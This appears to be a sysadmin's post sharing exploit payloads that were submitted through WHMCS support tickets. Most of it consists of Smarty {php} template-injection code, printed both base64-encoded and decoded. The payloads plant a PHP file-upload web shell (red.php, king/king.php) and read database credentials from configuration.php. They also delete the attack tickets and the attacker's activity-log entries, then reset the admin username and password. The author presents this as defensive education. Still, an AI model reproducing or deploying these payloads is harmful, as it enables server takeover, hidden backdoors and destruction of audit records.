The encoded samples below were submitted via support ticket to WHMCS to attempt to exploit a weakness.
The code below is for educational purposes only. As a sysadmin, Its easier to defend from an attack you fully understand as opposed to being kept in the dark by the software vendor who's only response to this issues is "We've fixed it"
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php}Decoded to:That encoded string decodes to:$code = base64_decode("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgU1VLU0VTICEhITwvYj48YnI+PGJyPic7IH0NCgllbHNlIHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+");$fo = fopen("templates_c/red.php","w");fwrite($fo,$code);
I also got this message from the same person:echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
{php}eval(base64_decode ('JGNvZGUgPSBiYXNlNjRfZGVjb2RlDQoNCigiUEQ5d2FIQU5DbVZqYUc4Z0p6eG1iM0p0SUdGamRHbHZiajBpSWlCdFpYUm9iMlE5SW5CdmMzUWlJR1Z1WTNSNWNHVTlJbTExYkhScGNHRnlkQzltYjNKdExXUmhkR0VpS Uc1aGJXVTlJblZ3Ykc5aFpHVnlJaUJwWkQwaWRYQnNiMkZrWlhJaVBpYzdEUXBsWTJodklDYzhhVzV3ZFhRZ2RIbHdaDQoNClQwaVptbHNaU0lnYm1GdFpUMGlabWxzWlNJZ2MybDZaVDBpTlRBaVBqeHBibkIxZENCdVlX MWxQU0pmZFhCc0lpQjBlWEJsUFNKemRXSnRhWFFpSUdsa1BTSmZkWEJzSWlCMllXeDFaVDBpVlhCc2IyRmtJajQ4TDJadmNtMCtKenNOQ21sbUtDQWtYMUJQVTFSYkoxOTFjR3duWFNBOVBTQWlWWEJzDQoNCmIyRmtJaUF wSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVE lDRWhJVHd2WWo0OFluSQ0KDQorUEdKeVBpYzdJSDBOQ2dsbGJITmxJSHNnWldOb2J5QW5QR0krVlhCc2IyRmtJRWRCUjBGTUlDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DbjBOQ2o4KyIpOw0KJG1rZGlyID0gQG1rZ GlyICgia2luZyIsNzU1KTsNCiRmbyA9IGZvcGVuKCJraW5nL2tpbmcucGhwIiwidyIpOw0KZndyaXRlKCRmbywkY29kZSk7DQokdGV4dD1maWxlX2dldF9jb250ZW50cygiY29uZmlndXJhdGlvbi5waHAiKTsNCiR0ZXh0 PSBzdHJfcmVwbGFjZSgiPD9waHAiLCAiIiwgJHRleHQpOw0KJHRleHQ9IHN0cl9yZXBsYWNlKCI8PyIsICIiLCAkdGV4dCk7DQokdGV4dD0gc3RyX3JlcGxhY2UoIj8+IiwgIiIsICR0ZXh0KTsNCmV2YWwoJHRleHQpOw0 KJGRiPW15c3FsX2Nvbm5lY3QoJGRiX2hvc3QsJGRiX3VzZXJuYW1lLCRkYl9wYXNzd29yZClvciBkaWUoIkNhbid0IG9wZW4gY29ubmVjdGlvbiB0byBNeVNRTCIpOw0KbXlzcWxfc2VsZWN0X2RiKCRkYl9uYW1lKSBvci BkaWUoIkNhbid0IHNlbGVjdCBkYXRhYmFzZSIpOw0KJGRlbGV0ZSA9IkRFTEVURSBmcm9tIHRibHRpY2tldHMgV0hFUkUgdGl0bGUgbGlrZSAweDI1N0I3MDY4NzA3RDI1OyI7DQpteXNxbF9xdWVyeSgkZGVsZXRlKTsNC iRkZWxldGUyID0iREVMRVRFIGZyb20gdGJsYWN0aXZpdHlsb2cgIFdIRVJFIGlwYWRkcj0nIi4kX1NFUlZFUlsnUkVNT1RFX0FERFInXS4iJzsiOw0KbXlzcWxfcXVlcnkoJGRlbGV0ZTIpOw0KJHNhID0gbXlzcWxfcXVl cnkoIlVQREFURSB0YmxhZG1pbnMgIFNFVCB1c2VybmFtZT0nYWRtaW4nIFdIRVJFIGlkID0nMSc7Iik7DQokc2ExID0gbXlzcWxfcXVlcnkoIlVQREFURSB0YmxhZG1pbnMgIFNFVCBwYXNzd29yZCA9ICc5OTc1NDEwNjY zM2Y5NGQzNTBkYjM0ZDU0OGQ2MDkxYScgV0hFUkUgd2hlcmUgaWQgPScxJzsiKTs='));{/php} Decoded to:<?php
$code = base64_decode("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgU1VLU0VTICEhITwvYj48YnI+PGJyPic7IH0NCgllbHNlIHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+");$mkdir = @mkdir("king",755);$fo = fopen("king/king.php","w");fwrite($fo,$code);$text = file_get_contents("configuration.php");$text = str_replace("<?php", "", $text);$text = str_replace("<?", "", $text);$text = str_replace("?>", "", $text);
eval($text);$db = mysql_connect($db_host,$db_username,$db_password)or die("Can't open connection to MySQL");mysql_select_db($db_name) or die("Can't select database");$delete = "DELETE from tbltickets WHERE title like 0x257B7068707D25;";mysql_query($delete);$delete2 = "DELETE from tblactivitylog WHERE ipaddr='".$_SERVER['REMOTE_ADDR']."';";mysql_query($delete2);$sa = mysql_query("UPDATE tbladmins SET username='admin' WHERE id ='1';");$sa1 = mysql_query("UPDATE tbladmins SET password = '99754106633f94d350db34d548d6091a' WHERE where id ='1';");?> 
